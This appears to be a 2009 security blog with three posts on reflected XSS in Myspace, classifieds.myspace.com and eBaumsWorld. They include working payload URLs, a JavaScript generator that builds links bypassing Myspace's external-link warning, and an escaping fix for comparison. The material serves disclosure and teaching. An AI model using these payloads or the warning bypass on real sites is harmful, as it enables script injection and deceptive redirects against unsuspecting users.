This site is soon to be deprecated by http://www.johnleitch.net

Sunday, June 21, 2009

Bypassing Msplinks.com Notifications - Myspace.com

As a preventive measure, Myspace.com routes all user-posted links through Msplinks.com. If the linked site is not on the msplinks whitelist, a notification that the user is leaving for an external site is displayed, and the user must click another link to continue. To circumvent this system, an XSS vulnerability in a whitelisted site can be used as a redirect: the whitelist check only sees the whitelisted host, and the injected script sends the browser on to the real destination.



Fortunately ytmnd.com, which is whitelisted, has such a vulnerability. By prepending 01 to the URL-encoded XSS redirect URL, base64 encoding the result, and appending it to http://www.msplinks.com/, we can create a link that can be posted on Myspace. When the user clicks this link, no external site warning is displayed.

The vulnerable whitelisted site:
http://www.ytmnd.com/search?q="]}}};window.location='http://www.asdf.com/';{{{//

An msplinks link that redirects to the XSS redirect:
http://www.msplinks.com/MDFodHRwOi8vd3d3Lnl0bW5kLmNvbS9zZWFyY2g/cT0lMjIlNUQlN0QlN0QlN0Q7d2luZG93LmxvY2F0aW9uPSdodHRwOi8vd3d3LmFzZGYuY29tLyc7JTdCJTdCJTdCLy8=
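To make the construction concrete, here is an added example (not code from the original post, and not msplinks.com's own implementation) that rebuilds the link above in JavaScript. It assumes that the path after http://www.msplinks.com/ is simply base64("01" + percent-encoded target URL), which is what the link on this page decodes to; the function names msplinksLink, decodeMsplinksLink and whitelistedHost are my own.

```javascript
// Added example: build and decode an msplinks.com-style redirect link.
// Assumption (checked against the link in the post): the path after
// http://www.msplinks.com/ is base64("01" + percent-encoded target URL).

const MSPLINKS_BASE = "http://www.msplinks.com/";

// The XSS redirect URL from the post, exactly as typed into the address bar.
const YTMND_REDIRECT =
  "http://www.ytmnd.com/search?q=\"]}}};window.location='http://www.asdf.com/';{{{//";

// Percent-encode the way a browser does for the address bar (encodeURI keeps
// ; / ? : = ' and the other reserved characters and escapes " ] } {),
// prefix "01", then base64-encode the bytes.
function msplinksLink(targetUrl) {
  const payload = "01" + encodeURI(targetUrl);
  return MSPLINKS_BASE + Buffer.from(payload, "latin1").toString("base64");
}

// Reverse the construction so a link found in the wild can be inspected.
// latin1 keeps the round trip byte-for-byte even if the payload is not UTF-8.
function decodeMsplinksLink(link) {
  if (!link.startsWith(MSPLINKS_BASE)) throw new Error("not an msplinks link");
  const b64 = link.slice(MSPLINKS_BASE.length);
  const payload = Buffer.from(b64, "base64").toString("latin1");
  return { prefix: payload.slice(0, 2), url: payload.slice(2) };
}

// What a host-based whitelist would check: only the outer host of the decoded
// URL. A redirect inside a whitelisted site is therefore enough to pass it.
function whitelistedHost(link) {
  return new URL(decodeMsplinksLink(link).url).hostname;
}

const link = msplinksLink(YTMND_REDIRECT);
console.log(link);
console.log(decodeMsplinksLink(link));
console.log("host seen by whitelist:", whitelistedHost(link));
```

Running it reproduces the msplinks link shown above character for character, and decoding it back shows that the only host a whitelist could see is www.ytmnd.com; the real destination, http://www.asdf.com/, is buried inside the query string.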

Thursday, June 4, 2009

Breaking Things With Null - Classifieds.Myspace.Com

Sometimes passing special characters through a query string causes strange behavior. Using URL encoding (%00) we can pass the null character as the search term on classifieds.myspace.com. The result is an error page notifying the user that the server is too busy, and it just so happens that the retry link on that page reflects the query unescaped into an attribute, so the payload can close the attribute and add an onmouseover handler. The resulting XSS works in both Chrome and IE.



http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);

And with styling:

http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);"style="float:left;height:999px;width:999px;margin-top:-400px

Tuesday, June 2, 2009

Getting The Most Out Of onmouseover - eBaumsWorld.com

By styling a vulnerable element, an inline onmouseover event can be nearly as effective as onload. Using the width and height CSS properties, the chance of the user hovering their mouse over the vulnerable element can be greatly increased.



http://www.ebaumsworld.com/search/criteria="onmouseover="alert(0);

Prior to styling the control, the injected script only runs if the user hovers over the search input in the center of the screen.



http://www.ebaumsworld.com/search/criteria="style="width:999px;height:999px;"onmouseover="alert(0);

With more screen real estate taken up by the newly styled input, the chances of triggering the event are much better.
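The classifieds.myspace.com and eBaumsWorld posts above both work the same way: the search term is echoed into a double-quoted attribute, and a leading quote closes it so the rest of the payload becomes new attributes. As an added example (not code from either site or from the original posts), here is a constructed stand-in for a page that reflects the search term into value="...", its attribute-encoded fix, and a small check that lists which attributes a browser would see on the resulting tag. It runs both the %00 payload from the classifieds post and the styled payload from the eBaumsWorld post. The template, the function names and the tokenizer are assumptions; the real pages' markup is not shown on this page.

```javascript
// Added example: a constructed stand-in for a page that reflects the search
// term into an attribute, beside its hardened form. Not the real sites' code.

// Raw query strings taken from the URLs in the two posts (constructed input).
const Q_NULL = '%00"onmouseover="alert(0);';
const Q_STYLED = '"style="width:999px;height:999px;"onmouseover="alert(0);';

// Vulnerable stand-in: the decoded search term lands in value="..." untouched.
function renderVulnerable(rawQuery) {
  const q = decodeURIComponent(rawQuery); // %00 becomes a real NUL character
  return `<input type="text" name="q" value="${q}">`;
}

// Hardened form: encode the characters that can end an attribute or a tag.
function escapeAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderHardened(rawQuery) {
  const q = escapeAttr(decodeURIComponent(rawQuery));
  return `<input type="text" name="q" value="${q}">`;
}

// Rough tokenizer: list the name="value" pairs on a single tag, in order.
// Enough to show whether the injected attributes survive; not a real HTML parser.
function attributeNames(tag) {
  const names = [];
  const re = /([^\s"'=<>\/]+)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1]);
  return names;
}

// True when the payload managed to add an onmouseover handler to the tag.
function hasInjectedHandler(tag) {
  return attributeNames(tag).includes("onmouseover");
}

for (const q of [Q_NULL, Q_STYLED]) {
  console.log("vulnerable:", attributeNames(renderVulnerable(q)));
  console.log("hardened:  ", attributeNames(renderHardened(q)));
}
```

With the vulnerable template the styled payload yields type, name, value, style and onmouseover, which is exactly the oversized, hover-sensitive input described above; with the hardened template both payloads end up inside the value attribute and no handler is added. The NUL from %00 survives decodeURIComponent as a real character in the string, which is the kind of input that pushed the classifieds site onto its error page in the first place.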